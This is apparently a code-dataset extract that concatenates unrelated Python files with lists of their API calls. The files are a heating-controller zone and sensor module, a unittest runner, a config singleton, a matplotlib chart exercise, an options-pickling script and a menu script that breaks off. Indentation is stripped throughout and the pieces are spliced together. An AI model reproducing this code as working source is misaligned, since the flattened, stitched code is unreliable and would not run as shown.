In addition, there may be 'orphan' (e.g. from a neighbour) sensors
announcing temperatures with the same value.
This leaves only a process of exclusion as a means to determine which zone
uses the controller as a sensor.
"""
prev_msg, self._prev_30c9 = self._prev_30c9, msg
if prev_msg is None:
return
if len([z for z in self.zones if z.sensor is None]) == 0:
return # (currently) no zone without a sensor
# if self._gwy.serial_port: # only if in monitor mode...
secs = self._get_msg_value("1F09", "remaining_seconds")
if secs is None or msg.dtm > prev_msg.dtm + td(seconds=secs):
return # only compare against 30C9 (array) pkt from the last cycle
_LOGGER.debug("System state (before): %s", self)
changed_zones = {
z["zone_idx"]: z["temperature"]
for z in msg.payload
if z not in prev_msg.payload
} # zones with changed temps
_LOGGER.debug("Changed zones (from 30C9): %s", changed_zones)
if not changed_zones:
return # ctl's 30C9 says no zones have changed temps during this cycle
testable_zones = {
z: t
for z, t in changed_zones.items()
if self.zone_by_idx[z].sensor is None
and t not in [v for k, v in changed_zones.items() if k != z] + [None]
} # ...with unique (non-null) temps, and no sensor
_LOGGER.debug(
" - with unique/non-null temps (from 30C9), no sensor (from state): %s",
testable_zones,
)
if not testable_zones:
return # no testable zones
testable_sensors = [
d
for d in self._gwy.devices # not: self.devices
if d._ctl in (self, None)
and d.addr.type in DEVICE_HAS_ZONE_SENSOR
and d.temperature is not None
and d._msgs["30C9"].dtm > prev_msg.dtm # changed temp during last cycle
]
if _LOGGER.isEnabledFor(logging.DEBUG):
_LOGGER.debug(
"Testable zones: %s (unique/non-null temps & sensorless)",
testable_zones,
)
_LOGGER.debug(
"Testable sensors: %s (non-null temps & orphans or zoneless)",
{d.id: d.temperature for d in testable_sensors},
)
if testable_sensors: # the main matching algorithm...
for zone_idx, temp in testable_zones.items():
# TODO: when sensors announce temp, ?also includes it's parent zone
matching_sensors = [
s
for s in testable_sensors
if s.temperature == temp and s._zone in (zone_idx, None)
]
_LOGGER.debug("Testing zone %s, temp: %s", zone_idx, temp)
_LOGGER.debug(
" - matching sensor(s): %s (same temp & not from another zone)",
[s.id for s in matching_sensors],
)
if len(matching_sensors) == 1:
_LOGGER.debug(" - matched sensor: %s", matching_sensors[0].id)
zone = self.zone_by_idx[zone_idx]
zone._set_sensor(matching_sensors[0])
zone.sensor._set_ctl(self)
elif len(matching_sensors) == 0:
_LOGGER.debug(" - no matching sensor (uses CTL?)")
else:
_LOGGER.debug(" - multiple sensors: %s", matching_sensors)
_LOGGER.debug("System state (after): %s", self)
# now see if we can allocate the controller as a sensor...
if self._zone is not None:
return # the controller has already been allocated
if len([z for z in self.zones if z.sensor is None]) != 1:
return # no single zone without a sensor
testable_zones = {
z: t
for z, t in changed_zones.items()
if self.zone_by_idx[z].sensor is None
} # this will be true if ctl is sensor
if not testable_zones:
return # no testable zones
zone_idx, temp = list(testable_zones.items())[0]
_LOGGER.debug("Testing (sole remaining) zone %s, temp: %s", zone_idx, temp)
# want to avoid complexity of z._temp
# zone = self.zone_by_idx[zone_idx]
# if zone._temp is None:
# return # TODO: should have a (not-None) temperature
matching_sensors = [
s
for s in testable_sensors
if s.temperature == temp and s._zone in (zone_idx, None)
]
_LOGGER.debug(
" - matching sensor(s): %s (excl. controller)",
[s.id for s in matching_sensors],
)
# can safely(?) assume this zone is using the CTL as a sensor...
if len(matching_sensors) == 0:
_LOGGER.debug(" - matched sensor: %s (by exclusion)", self._ctl.id)
zone = self.zone_by_idx[zone_idx]
zone._set_sensor(self)
zone.sensor._set_ctl(self)
_LOGGER.debug("System state (finally): %s", self)
super()._handle_msg(msg)
if msg.code in ("000A",) and isinstance(msg.payload, list):
for zone_idx in self.zone_by_idx:
cmd = Command.get_zone_mode(self.id, zone_idx, priority=Priority.LOW)
self._gwy.send_cmd(cmd)
# for zone in self.zones:
# zone._discover(discover_flags=DISCOVER_PARAMS)
if msg.code in ("000A", "2309", "30C9"):
pass
# if isinstance(msg.payload, list):
# elif msg.code == "000C":
# self._msgs[f"{msg.code}"] = msg
# elif msg.code == "0005" and prev_msg is not None:
# zone_added = bool(prev_msg.code == "0004") # else zone_deleted
# elif msg.code == "30C9" and isinstance(msg.payload, list): # msg.is_array:
# find_zone_sensors()
def _get_zone(self, zone_idx, sensor=None, **kwargs) -> Zone:
"""Return a zone (will create it if required).
Can also set a zone's sensor, and zone_type, and actuators.
"""
def create_zone(zone_idx) -> Zone:
if int(zone_idx, 16) >= self._gwy.config[MAX_ZONES]:
raise ValueError(f"Invalid zone idx: {zone_idx} (exceeds max_zones)")
if zone_idx in self.zone_by_idx:
raise LookupError(f"Duplicated zone: {zone_idx} for {self}")
zone = Zone(self, zone_idx)
if not self._gwy.config[DISABLE_DISCOVERY]: # TODO: needs tidyup (ref #67)
zone._discover() # discover_flag=DISCOVER_ALL)
return zone
if zone_idx == "HW":
return super()._get_zone(zone_idx, sensor=sensor, **kwargs)
if int(zone_idx, 16) >= self._gwy.config[MAX_ZONES]:
raise ValueError(f"Unknown zone_idx/domain_id: {zone_idx}")
zone = self.zone_by_idx.get(zone_idx)
if zone is None:
zone = create_zone(zone_idx)
if kwargs.get("zone_type"):
zone._set_zone_type(kwargs["zone_type"])
if kwargs.get("actuators"): # TODO: check not an address before implmenting
for device in [d for d in kwargs["actuators"] if d not in zone.devices]:
zone.devices.append(device)
zone.device_by_id[device.id] = device
if sensor is not None:
zone._set_sensor(sensor)
return zone
@property
def _zones(self) -> dict:
return sorted(self.zones, key=lambda x: x.idx)
@property
def schema(self) -> dict:
assert ATTR_ZONES not in super().schema # TODO: removeme
return {**super().schema, ATTR_ZONES: {z.idx: z.schema for z in self._zones}}
@property
def params(self) -> dict:
assert ATTR_ZONES not in super().params # TODO: removeme
return {**super().params, ATTR_ZONES: {z.idx: z.params for z in self._zones}}
@property
def status(self) -> dict:
assert ATTR_ZONES not in super().status # TODO: removeme
return {**super().status, ATTR_ZONES: {z.idx: z.status for z in self._zones}}
class UfhSystem:
@property
def schema(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().schema # TODO: removeme
return {
**super().schema,
ATTR_UFH_SYSTEM: {
d.id: d.schema for d in sorted(self._ctl.devices) if d.type == "02"
},
}
@property
def params(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().params # TODO: removeme
return {
**super().params,
ATTR_UFH_SYSTEM: {
d.id: d.params for d in sorted(self._ctl.devices) if d.type == "02"
},
}
@property
def status(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().status # TODO: removeme
return {
**super().status,
ATTR_UFH_SYSTEM: {
d.id: d.status for d in sorted(self._ctl.devices) if d.type == "02"
},
}
class SystemBase(Entity): # 3B00 (multi-relay)
"""The most basic controllers - a generic controller (e.g. ST9420C)."""
# 0008|0009|1030|1100|2309|3B00
def __init__(self, gwy, ctl, **kwargs) -> None:
# _LOGGER.debug("Creating a System: %s (%s)", dev_addr.id, self.__class__)
super().__init__(gwy, **kwargs)
self.id = ctl.id
gwy.systems.append(self)
gwy.system_by_id[self.id] = self
self._ctl = ctl
self._domain_id = "FF"
self._evo = None
self._heat_demand = None
self._htg_control = None
def __repr__(self) -> str:
return f"{self._ctl.id} (sys_base)"
# def __str__(self) -> str: # TODO: WIP
# return json.dumps({self._ctl.id: self.schema})
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
# super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_SCHEMA:
[ # 000C: find the HTG relay and DHW sensor, if any (DHW relays in DHW)
self._send_cmd("000C", payload=dev_type)
for dev_type in ("000D", "000F") # CODE_000C_DEVICE_TYPE
# for dev_type, description in CODE_000C_DEVICE_TYPE.items() fix payload
# if description is not None
]
if discover_flag & DISCOVER_PARAMS:
self._send_cmd("1100", payload="FC") # TPI params
# # for code in ("3B00",): # 3EF0, 3EF1
# # for payload in ("0000", "00", "F8", "F9", "FA", "FB", "FC", "FF"):
# # self._send_cmd(code, payload=payload)
# # TODO: opentherm: 1FD4, 22D9, 3220
# if discover_flag & DISCOVER_PARAMS:
# for domain_id in range(0xF8, 0x100):
# self._send_cmd("0009", payload=f"{domain_id:02X}00")
if discover_flag & DISCOVER_STATUS:
# for domain_id in range(0xF8, 0x100):
# self._send_cmd("0008", payload=f"{domain_id:02X}00")
pass
def _handle_msg(self, msg) -> bool:
def OUT_is_exchange(this, prev): # TODO:use is?
return this.src is prev.dst and this.dst is prev.src.addr
def OUT_find_htg_relay(this, prev=None):
"""Discover the heat relay (10: or 13:) for this system.
There's' 3 ways to find a controller's heat relay (in order of reliability):
1. The 3220 RQ/RP *to/from a 10:* (1x/5min)
2a. The 3EF0 RQ/RP *to/from a 10:* (1x/1min)
2b. The 3EF0 RQ (no RP) *to a 13:* (3x/60min)
3. The 3B00 I/I exchange between a CTL & a 13: (TPI cycle rate, usu. 6x/hr)
Data from the CTL is considered 'authorative'. The 1FC9 RQ/RP exchange
to/from a CTL is too rare to be useful.
"""
# 18:14:14.025 066 RQ --- 01:078710 10:067219 --:------ 3220 005 0000050000
# 18:14:14.446 065 RP --- 10:067219 01:078710 --:------ 3220 005 00C00500FF
# 14:41:46.599 064 RQ --- 01:078710 10:067219 --:------ 3EF0 001 00
# 14:41:46.631 063 RP --- 10:067219 01:078710 --:------ 3EF0 006 0000100000FF # noqa
# 06:49:03.465 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 06:49:05.467 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 06:49:07.468 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 09:03:59.693 051 I --- 13:237335 --:------ 13:237335 3B00 002 00C8
# 09:04:02.667 045 I --- 01:145038 --:------ 01:145038 3B00 002 FCC8
# note the order: most to least reliable
heater = None
if this.code == "3220" and this.verb == "RQ":
if this.src is self and this.dst.type == "10":
heater = this.dst
elif this.code == "3EF0" and this.verb == "RQ":
if this.src is self and this.dst.type in ("10", "13"):
heater = this.dst
elif this.code == "3B00" and this.verb == " I" and prev is not None:
if prev.code == this.code and prev.verb == this.verb:
if this.src is self and prev.src.type == "13":
heater = prev.src
if heater is not None:
self._set_htg_control(heater)
if msg.code in ("000A", "2309", "30C9") and not isinstance(msg.payload, list):
pass
else:
super()._handle_msg(msg)
if msg.code == "0008" and msg.verb in (" I", "RP"):
if "domain_id" in msg.payload:
self._relay_demands[msg.payload["domain_id"]] = msg
if msg.payload["domain_id"] == "F9":
device = self.dhw.heating_valve if self.dhw else None
elif msg.payload["domain_id"] == "FA":
device = self.dhw.hotwater_valve if self.dhw else None
elif msg.payload["domain_id"] == "FC":
device = self.heating_control
else:
device = None
if False and device is not None: # TODO: FIXME
qos = {"priority": Priority.LOW, "retries": 2}
for code in ("0008", "3EF1"):
device._send_cmd(code, qos)
if msg.code == "3150" and msg.verb in (" I", "RP"):
if "domain_id" in msg.payload and msg.payload["domain_id"] == "FC":
self._heat_demand = msg.payload
# if msg.code in ("3220", "3B00", "3EF0"): # self.heating_control is None and
# find_htg_relay(msg, prev=prev_msg)
def _send_cmd(self, code, **kwargs) -> None:
dest = kwargs.pop("dest_addr", self._ctl.id)
payload = kwargs.pop("payload", "00")
super()._send_cmd(code, dest, payload, **kwargs)
@property
def devices(self) -> List[Device]:
return self._ctl.devices + [self._ctl] # TODO: to sort out
@property
def heating_control(self) -> Device:
if self._htg_control:
return self._htg_control
htg_control = [d for d in self._ctl.devices if d._domain_id == "FC"]
return htg_control[0] if len(htg_control) == 1 else None # HACK for 10:
def _set_htg_control(self, device: Device) -> None: # self._htg_control
"""Set the heating control relay for this system (10: or 13:)."""
if not isinstance(device, Device) or device.type not in ("10", "13"):
raise TypeError(f"{ATTR_HTG_CONTROL} can't be: {device}")
if self._htg_control is not None:
if self._htg_control is device:
return
raise CorruptStateError(
f"{ATTR_HTG_CONTROL} shouldn't change: {self._htg_control} to {device}"
)
# if device.evo is not None and device.evo is not self:
# raise LookupError
if self._htg_control is None:
self._htg_control = device
device._set_parent(self, domain="FC")
@property
def tpi_params(self) -> Optional[float]: # 1100
return self._get_msg_value("1100")
@property
def heat_demand(self) -> Optional[float]: # 3150/FC
if self._heat_demand:
return self._heat_demand["heat_demand"]
@property
def is_calling_for_heat(self) -> Optional[bool]:
"""Return True is the system is currently calling for heat."""
if not self._htg_control:
return
if self._htg_control.actuator_state:
return True
@property
def schema(self) -> dict:
"""Return the system's schema."""
schema = {ATTR_CONTROLLER: self._ctl.id, ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in schema # TODO: removeme
assert ATTR_HTG_CONTROL not in schema[ATTR_HTG_SYSTEM] # TODO: removeme
schema[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
self.heating_control.id if self.heating_control else None
)
assert ATTR_ORPHANS not in schema[ATTR_HTG_SYSTEM] # TODO: removeme
schema[ATTR_ORPHANS] = sorted(
[d.id for d in self._ctl.devices if not d._domain_id and d.type != "02"]
) # devices without a parent zone, NB: CTL can be a sensor for a zones
# TODO: where to put this?
# assert "devices" not in schema # TODO: removeme
# schema["devices"] = {d.id: d.device_info for d in sorted(self._ctl.devices)}
return schema
@property
def params(self) -> dict:
"""Return the system's configuration."""
params = {ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in params # TODO: removeme
# devices don't have params
# assert ATTR_HTG_CONTROL not in params[ATTR_HTG_SYSTEM] # TODO: removeme
# params[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
# self.heating_control.params if self.heating_control else None
# )
assert "tpi_params" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["tpi_params"] = (
self.heating_control._get_msg_value("1100")
if self.heating_control
else None
)
return params
@property
def status(self) -> dict:
"""Return the system's current state."""
status = {ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in status # TODO: removeme
# assert ATTR_HTG_CONTROL not in status[ATTR_HTG_SYSTEM] # TODO: removeme
# status[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
# self.heating_control.status if self.heating_control else None
# )
status[ATTR_HTG_SYSTEM]["heat_demand"] = self.heat_demand
status[ATTR_DEVICES] = {d.id: d.status for d in sorted(self._ctl.devices)}
return status
class System(StoredHw, SysDatetime, SystemBase): # , SysFaultLog
"""The Controller class."""
def __init__(self, gwy, ctl, **kwargs) -> None:
super().__init__(gwy, ctl, **kwargs)
self._heat_demands = {}
self._relay_demands = {}
self._relay_failsafes = {}
def __repr__(self) -> str:
return f"{self._ctl.id} (system)"
def _handle_msg(self, msg) -> bool:
super()._handle_msg(msg)
if "domain_id" in msg.payload:
idx = msg.payload["domain_id"]
if msg.code == "0008":
self._relay_demands[idx] = msg
elif msg.code == "0009":
self._relay_failsafes[idx] = msg
elif msg.code == "3150":
self._heat_demands[idx] = msg
elif msg.code not in ("0001", "000C", "0418", "1100", "3B00"):
assert False, msg.code
@property
def heat_demands(self) -> Optional[dict]: # 3150
if self._heat_demands:
return {k: v.payload["heat_demand"] for k, v in self._heat_demands.items()}
@property
def relay_demands(self) -> Optional[dict]: # 0008
if self._relay_demands:
return {
k: v.payload["relay_demand"] for k, v in self._relay_demands.items()
}
@property
def relay_failsafes(self) -> Optional[dict]: # 0009
if self._relay_failsafes:
return {} # failsafe_enabled
@property
def status(self) -> dict:
"""Return the system's current state."""
status = super().status
assert ATTR_HTG_SYSTEM in status # TODO: removeme
status[ATTR_HTG_SYSTEM]["heat_demands"] = self.heat_demands
status[ATTR_HTG_SYSTEM]["relay_demands"] = self.relay_demands
status[ATTR_HTG_SYSTEM]["relay_failsafes"] = self.relay_failsafes
return status
class Evohome(SysLanguage, SysMode, MultiZone, UfhSystem, System): # evohome
# class Evohome(System): # evohome
"""The Evohome system - some controllers are evohome-compatible."""
def __init__(self, gwy, ctl, **kwargs) -> None:
super().__init__(gwy, ctl, **kwargs)
def __repr__(self) -> str:
return f"{self._ctl.id} (evohome)"
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._send_cmd("1F09")
def _handle_msg(self, msg) -> bool:
super()._handle_msg(msg)
# def xxx(zone_dict):
# zone = self.zone_by_idx[zone_dict.pop("zone_idx")]
# if msg.code == "000A":
# zone._zone_config = zone_dict
# elif msg.code == "2309":
# zone._temp = zone_dict
# elif msg.code == "30C9":
# zone._temp = zone_dict
# if msg.code in ("000A", "2309", "30C9"):
# if isinstance(msg.payload, list):
# super()._handle_msg(msg)
# [xxx(z) for z in msg.payload]
# else:
# xxx(msg.payload)
if msg.code in ("000A", "2309", "30C9") and isinstance(msg.payload, list):
pass
class Chronotherm(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (chronotherm)"
class Hometronics(System):
RQ_SUPPORTED = ("0004", "000C", "2E04", "313F") # TODO: WIP
RQ_UNSUPPORTED = ("xxxx",) # 10E0?
def __repr__(self) -> str:
return f"{self._ctl.id} (hometronics)"
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
# super()._discover(discover_flag=discover_flag)
# will RP to: 0005/configured_zones_alt, but not: configured_zones
# will RP to: 0004
if discover_flag & DISCOVER_STATUS:
self._send_cmd("1F09")
class Programmer(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (programmer)"
class Sundial(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (sundial)"
SYSTEM_CLASSES = {
SystemType.CHRONOTHERM: Chronotherm,
SystemType.EVOHOME: Evohome,
SystemType.HOMETRONICS: Hometronics,
SystemType.PROGRAMMER: Programmer,
SystemType.SUNDIAL: Sundial,
SystemType.GENERIC: System,
}
| [
"threading.Lock",
"datetime.timedelta",
"logging.getLogger"
] | [((859, 886), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (876, 886), False, 'import logging\n'), ((11388, 11394), 'threading.Lock', 'Lock', ([], {}), '()\n', (11392, 11394), False, 'from threading import Lock\n'), ((13353, 13369), 'datetime.timedelta', 'td', ([], {'seconds': 'secs'}), '(seconds=secs)\n', (13355, 13369), True, 'from datetime import timedelta as td\n')] |
import argparse
import unittest
import os
import importlib
import sys
from gmc.conf import settings, ENVIRONMENT_VARIABLE
from gmc.core import handler
def build_suite(test_labels=None):
suite = unittest.TestSuite()
test_loader = unittest.defaultTestLoader
test_labels = test_labels or ['.']
discover_kwargs = {}
for label in test_labels:
kwargs = discover_kwargs.copy()
tests = None
label_as_path = os.path.abspath(label)
# if a module, or "module.ClassName[.method_name]", just run those
if not os.path.exists(label_as_path):
tests = test_loader.loadTestsFromName(label)
elif os.path.isdir(label_as_path):
top_level = label_as_path
while True:
init_py = os.path.join(top_level, '__init__.py')
if os.path.exists(init_py):
try_next = os.path.dirname(top_level)
if try_next == top_level:
# __init__.py all the way down? give up.
break
top_level = try_next
continue
break
kwargs['top_level_dir'] = top_level
if not (tests and tests.countTestCases()) and is_discoverable(label):
# Try discovery if path is a package or directory
tests = test_loader.discover(start_dir=label, **kwargs)
# Make unittest forget the top-level dir it calculated from this
# run, to support running tests from two different top-levels.
test_loader._top_level_dir = None
suite.addTests(tests)
return suite
def is_discoverable(label):
"""
Check if a test label points to a python package or file directory.
Relative labels like "." and ".." are seen as directories.
"""
try:
mod = importlib.import_module(label)
except (ImportError, TypeError):
pass
else:
return hasattr(mod, '__path__')
return os.path.isdir(os.path.abspath(label))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'modules', nargs='*',
help='Optional path(s) to test modules; e.g. "test_settings" or '
'"test_settings.tests.TestSettings.test_settings_loader".',
)
parser.add_argument('--settings', help='Test gmc with different settings file')
args = parser.parse_args()
if args.settings:
handler.execute_from_command_line(['', args.settings], quiet=True)
os.environ['DUMMY'] = "FALSE"
else:
os.environ[ENVIRONMENT_VARIABLE] = 'setting'
os.environ['DUMMY'] = "TRUE"
args.modules = [os.path.normpath(labels) for labels in args.modules]
suite = build_suite(args.modules)
runner = unittest.TextTestRunner()
runner.run(suite) | [
"os.path.abspath",
"gmc.core.handler.execute_from_command_line",
"unittest.TextTestRunner",
"importlib.import_module",
"argparse.ArgumentParser",
"unittest.TestSuite",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"os.path.normpath",
"os.path.join"
] | [((200, 220), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (218, 220), False, 'import unittest\n'), ((2082, 2107), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2105, 2107), False, 'import argparse\n'), ((2792, 2817), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (2815, 2817), False, 'import unittest\n'), ((446, 468), 'os.path.abspath', 'os.path.abspath', (['label'], {}), '(label)\n', (461, 468), False, 'import os\n'), ((1860, 1890), 'importlib.import_module', 'importlib.import_module', (['label'], {}), '(label)\n', (1883, 1890), False, 'import importlib\n'), ((2017, 2039), 'os.path.abspath', 'os.path.abspath', (['label'], {}), '(label)\n', (2032, 2039), False, 'import os\n'), ((2462, 2528), 'gmc.core.handler.execute_from_command_line', 'handler.execute_from_command_line', (["['', args.settings]"], {'quiet': '(True)'}), "(['', args.settings], quiet=True)\n", (2495, 2528), False, 'from gmc.core import handler\n'), ((2688, 2712), 'os.path.normpath', 'os.path.normpath', (['labels'], {}), '(labels)\n', (2704, 2712), False, 'import os\n'), ((559, 588), 'os.path.exists', 'os.path.exists', (['label_as_path'], {}), '(label_as_path)\n', (573, 588), False, 'import os\n'), ((660, 688), 'os.path.isdir', 'os.path.isdir', (['label_as_path'], {}), '(label_as_path)\n', (673, 688), False, 'import os\n'), ((778, 816), 'os.path.join', 'os.path.join', (['top_level', '"""__init__.py"""'], {}), "(top_level, '__init__.py')\n", (790, 816), False, 'import os\n'), ((836, 859), 'os.path.exists', 'os.path.exists', (['init_py'], {}), '(init_py)\n', (850, 859), False, 'import os\n'), ((892, 918), 'os.path.dirname', 'os.path.dirname', (['top_level'], {}), '(top_level)\n', (907, 918), False, 'import os\n')] |
# -*- coding: utf-8 -*-
""" Singleton class to manage configuration
Description:
Todo:
"""
import json
import os
import sys
import logging
import constant
class Config(object):
# Here will be the instance stored.
__instance = None
@classmethod
def getInstance(cls):
""" Static access method. """
if Config.__instance == None:
raise Exception("Any configuration is not initialized yet!")
return Config.__instance
def __init__(self, url):
""" Virtually private constructor. """
if Config.__instance != None:
raise Exception("This class is a singleton!")
else:
self.config = dict()
self.load(url)
self._url = url
Config.__instance = self
def load(self, url):
try:
self.config = json.load(open(url))
self.config["version"] = constant.APPVERSION
logging.info(self.config)
except Exception as error:
logging.error(error, exc_info=True)
return self.config
def store(self):
try:
with open(self._url, "w") as outfile:
json.dump(self.config, outfile, indent=4)
except Exception as error:
logging.error(error, exc_info=True)
| [
"json.dump",
"logging.info",
"logging.error"
] | [((936, 961), 'logging.info', 'logging.info', (['self.config'], {}), '(self.config)\n', (948, 961), False, 'import logging\n'), ((1009, 1044), 'logging.error', 'logging.error', (['error'], {'exc_info': '(True)'}), '(error, exc_info=True)\n', (1022, 1044), False, 'import logging\n'), ((1173, 1214), 'json.dump', 'json.dump', (['self.config', 'outfile'], {'indent': '(4)'}), '(self.config, outfile, indent=4)\n', (1182, 1214), False, 'import json\n'), ((1262, 1297), 'logging.error', 'logging.error', (['error'], {'exc_info': '(True)'}), '(error, exc_info=True)\n', (1275, 1297), False, 'import logging\n')] |
##
## Graficacion usando Matplotlib
## ===========================================================================
##
## Construya una gráfica similar a la presentada en el archivo `original.png`
## usando el archivo `data.csv`. La gráfica generada debe salvarse en el
## archivo `generada.png`.
##
## Salve la figura al disco con:
##
## plt.savefig('generada.png')
##
## >>> Escriba su codigo a partir de este punto <<<
##
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
df = pd.read_csv('data.csv', sep=',')
data = df.groupby('Region').sum()[['Poblacion 0-14', 'Poblacion 15-64', 'Poblacion 65+']]
fig, axs = plt.subplots(1, 6, sharex='col', sharey='row', figsize=(13,6), dpi=72);
plt.subplots_adjust(wspace = 0.1, hspace=0.1)
plt.setp(axs[0], ylabel='Poblacion')
for index, region in enumerate(data.index):
axs[index].bar(range(3), data.iloc[index,:], color=['tab:orange', 'tab:blue', 'tab:green'])
for n, ax in enumerate(axs):
ax.set_xticks(range(3));
ax.set_xticklabels(data.columns, rotation=90);
ax.set_title(data.index[n]);
plt.tight_layout()
plt.savefig('generada.png'); | [
"pandas.read_csv",
"matplotlib.pyplot.setp",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.savefig"
] | [((539, 571), 'pandas.read_csv', 'pd.read_csv', (['"""data.csv"""'], {'sep': '""","""'}), "('data.csv', sep=',')\n", (550, 571), True, 'import pandas as pd\n'), ((675, 746), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(6)'], {'sharex': '"""col"""', 'sharey': '"""row"""', 'figsize': '(13, 6)', 'dpi': '(72)'}), "(1, 6, sharex='col', sharey='row', figsize=(13, 6), dpi=72)\n", (687, 746), True, 'import matplotlib.pyplot as plt\n'), ((747, 790), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'wspace': '(0.1)', 'hspace': '(0.1)'}), '(wspace=0.1, hspace=0.1)\n', (766, 790), True, 'import matplotlib.pyplot as plt\n'), ((793, 829), 'matplotlib.pyplot.setp', 'plt.setp', (['axs[0]'], {'ylabel': '"""Poblacion"""'}), "(axs[0], ylabel='Poblacion')\n", (801, 829), True, 'import matplotlib.pyplot as plt\n'), ((1109, 1127), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1125, 1127), True, 'import matplotlib.pyplot as plt\n'), ((1128, 1155), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""generada.png"""'], {}), "('generada.png')\n", (1139, 1155), True, 'import matplotlib.pyplot as plt\n')] |
#!/usr/bin/env python
# Written by: DGC
#
#D This is purely for developer use, it will not be included in the program it
#D is just for adding/changing options in the standard Options.pickle file.
#
# python imports
from __future__ import unicode_literals
import os
import csv
import pickle
import sys
import re
# local imports
OPTIONS = {
"code_css": "Standard",
"code_css_class": "highlight",
"show_html": False,
"processor": "markdown_all",
"markdown_css": "Markdown",
"display_line_numbers": False,
"font": "Arial,12,-1,5,50,0,0,0,0,0",
}
LOCALISATION_OPTIONS = {
"language": "en_GB",
"available_languages": ["en_GB", "de_DE", "en_AU", "en_US", "fr_FR"],
}
TEST_OPTIONS = {
"code_css": "",
"code_css_class": "highlight",
"show_html": False,
"processor": "markdown_all",
"markdown_css": "",
"display_line_numbers": False,
"font": "Arial,12,-1,5,50,0,0,0,0,0",
# "language": "en_GB",
}
#==============================================================================
def write_config_file(object, file_name, directory="Resources"):
"""
Pickles the object to file_name where file_name is a relative path under
Resources
"""
options_path = os.path.join(
os.path.dirname(sys.argv[0]),
"../" + directory
)
file_path = os.path.join(options_path, file_name)
with open(file_path, "wb") as options_file:
pickle.dump(object, options_file)
#==============================================================================
def write_options_files():
write_config_file(OPTIONS, "Options.pickle")
write_config_file(
LOCALISATION_OPTIONS,
"Languages.pickle",
directory="Resources/Languages"
)
write_config_file(TEST_OPTIONS, "Options.pickle", directory="Integration")
#==============================================================================
def verify_keys(file_name, keys, verifier):
keys = set(keys)
verifier = set(verifier)
difference = [k for k in keys if k not in verifier]
if (difference):
raise Exception(
"Bad key found in %s: %s" %(file_name, str(difference))
)
#==============================================================================
def write_user_strings(file_name, verifier):
with open("data/" + file_name + ".csv", "rb") as csvfile:
table = csv.reader(csvfile)
for i, row in enumerate(table):
if (i == 0):
keys = row[1:]
verify_keys(file_name, keys, verifier)
continue
language = row[0]
user_text = dict(zip(keys, row[1:]))
write_config_file(
user_text,
file_name + ".pickle",
directory="Resources/Languages/" + language)
#==============================================================================
def generate_keys(pattern):
keys = list()
for path in os.listdir("."):
if (path[-3:] == ".py"):
with open(path, "r") as py_file:
lines = py_file.readlines()
for line in lines:
if (pattern.lower() in line.lower()):
match = re.search(".*" + pattern + "\[\"(.*)\"\]", line)
if match:
keys.append(match.group(1))
return keys
#==============================================================================
def generate_user_text_keys():
return generate_keys("USER_TEXT")
#==============================================================================
def generate_tool_tips_keys():
return generate_keys("TOOL_TIP")
#==============================================================================
def write_user_text():
write_user_strings("UserText", generate_user_text_keys())
#==============================================================================
def write_tool_tips():
write_user_strings("ToolTips", generate_tool_tips_keys())
#==============================================================================
if (__name__ == "__main__"):
write_options_files()
write_user_text()
write_tool_tips()
| [
"pickle.dump",
"csv.reader",
"os.path.dirname",
"re.search",
"os.path.join",
"os.listdir"
] | [((1345, 1382), 'os.path.join', 'os.path.join', (['options_path', 'file_name'], {}), '(options_path, file_name)\n', (1357, 1382), False, 'import os\n'), ((2979, 2994), 'os.listdir', 'os.listdir', (['"""."""'], {}), "('.')\n", (2989, 2994), False, 'import os\n'), ((1263, 1291), 'os.path.dirname', 'os.path.dirname', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (1278, 1291), False, 'import os\n'), ((1439, 1472), 'pickle.dump', 'pickle.dump', (['object', 'options_file'], {}), '(object, options_file)\n', (1450, 1472), False, 'import pickle\n'), ((2402, 2421), 'csv.reader', 'csv.reader', (['csvfile'], {}), '(csvfile)\n', (2412, 2421), False, 'import csv\n'), ((3231, 3279), 're.search', 're.search', (['(\'.*\' + pattern + \'\\\\["(.*)"\\\\]\')', 'line'], {}), '(\'.*\' + pattern + \'\\\\["(.*)"\\\\]\', line)\n', (3240, 3279), False, 'import re\n')] |
import os
clear = lambda: os.system('clear')
clear()
opcao = 1
while(opcao != 0):
print("Atividade de PARADIGMAS")
print(" 1 - QUESTÃO 01")
print(" 2 - QUESTÃO 02")
print(" 3 - QUESTÃO 03")
print(" 4 - QUESTÃO 04")
print(" 5 - QUESTÃO 05")
